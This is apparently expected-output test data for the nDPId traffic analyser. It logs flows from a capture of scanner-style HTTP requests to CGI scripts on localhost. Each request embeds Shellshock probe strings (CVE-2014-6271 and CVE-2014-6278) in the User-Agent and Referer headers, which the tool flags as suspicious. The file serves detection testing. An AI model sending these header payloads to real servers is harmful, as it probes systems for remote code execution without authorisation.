-00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} 
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} 
-01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 